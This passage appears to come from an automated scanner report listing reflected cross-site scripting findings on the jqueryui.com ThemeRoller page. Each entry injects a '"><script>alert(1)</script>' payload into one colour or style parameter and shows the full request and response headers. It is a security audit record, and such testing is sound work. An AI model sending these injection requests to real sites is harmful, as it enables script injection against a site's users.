f1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 872b5"><script>alert(1)</script>9fff6b1c01 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a872b5"><script>alert(1)</script>9fff6b1c01&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120253
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a120e"><script>alert(1)</script>942bd0c6a4c was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08a120e"><script>alert(1)</script>942bd0c6a4c&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4800b"><script>alert(1)</script>577c180fa0c was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f4800b"><script>alert(1)</script>577c180fa0c&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b6a"><script>alert(1)</script>69ecd42034e was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb0988b6a"><script>alert(1)</script>69ecd42034e&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbb08"><script>alert(1)</script>c5888f9db9a was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4pxcbb08"><script>alert(1)</script>c5888f9db9a&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ffad"><script>alert(1)</script>c201a131bf9 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px3ffad"><script>alert(1)</script>c201a131bf9 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48878"><script>alert(1)</script>450737abb18 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f0048878"><script>alert(1)</script>450737abb18&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e3de"><script>alert(1)</script>b2a0e37ea13 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=3333334e3de"><script>alert(1)</script>b2a0e37ea13&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61800"><script>alert(1)</script>1a28793f45b was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c461800"><script>alert(1)</script>1a28793f45b&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e4a5"><script>alert(1)</script>a8177aafd39 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff2e4a5"><script>alert(1)</script>a8177aafd39&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85e25"><script>alert(1)</script>bbf4528bd5e was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff85e25"><script>alert(1)</script>bbf4528bd5e&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44a5d"><script>alert(1)</script>ddc6b19163f was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=36363644a5d"><script>alert(1)</script>ddc6b19163f&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb649"><script>alert(1)</script>78dbef2ed8c was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
